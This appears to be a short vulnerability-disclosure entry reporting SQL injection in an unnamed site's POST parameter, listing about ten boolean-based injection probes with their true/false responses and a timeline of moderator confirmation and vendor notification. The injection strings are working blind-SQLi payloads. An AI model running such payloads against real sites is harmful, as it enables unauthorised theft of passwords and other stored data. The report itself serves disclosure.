Detailed information
Have SQL injection on site.
By using this weakness possible Steal sensitive information from the site (Passwords, site structure, etc.)
URL POST entry c -1 OR 3 * 2 * 16 AND 00075=00075
Tests:
-1 OR 2+75-75-1=0+0+0+1 -- => TRUE
-1 OR 3+75-75-1=0+0+0+1 -- => FALSE
-1 OR 3*2<(0+5+75-75) -- => FALSE
-1 OR 3*2>(0+5+75-75) -- => FALSE
-1 OR 2+1-1-1=1 AND 00075=00075 -- => TRUE
-1 OR 00075=00075 AND 3+1-1-1=1 -- => FALSE
-1 OR 3*2=5 AND 00075=00075 -- => FALSE
-1 OR 3*2=6 AND 00075=00075 -- => TRUE
-1 OR 3*2*0=6 AND 00075=00075 -- => FALSE
-1 OR 3*2*1=6 AND 00075=00075 -- => TRUE
Comments
-
12 January 2017, 16:33
Vulnerability status
Source company is answered -
05 January 2017, 20:02
Vulnerability status
Sended e-mail to source about vulnerability -
30 December 2016, 08:14
Added point to Vulnerability
Moderator gave 8 point from 10 to vulnerability -
30 December 2016, 08:13
Vulnerability status
Confirmed by Moderator -
29 December 2016, 23:06
Vulnerability added
Vulnerability added to BUGemot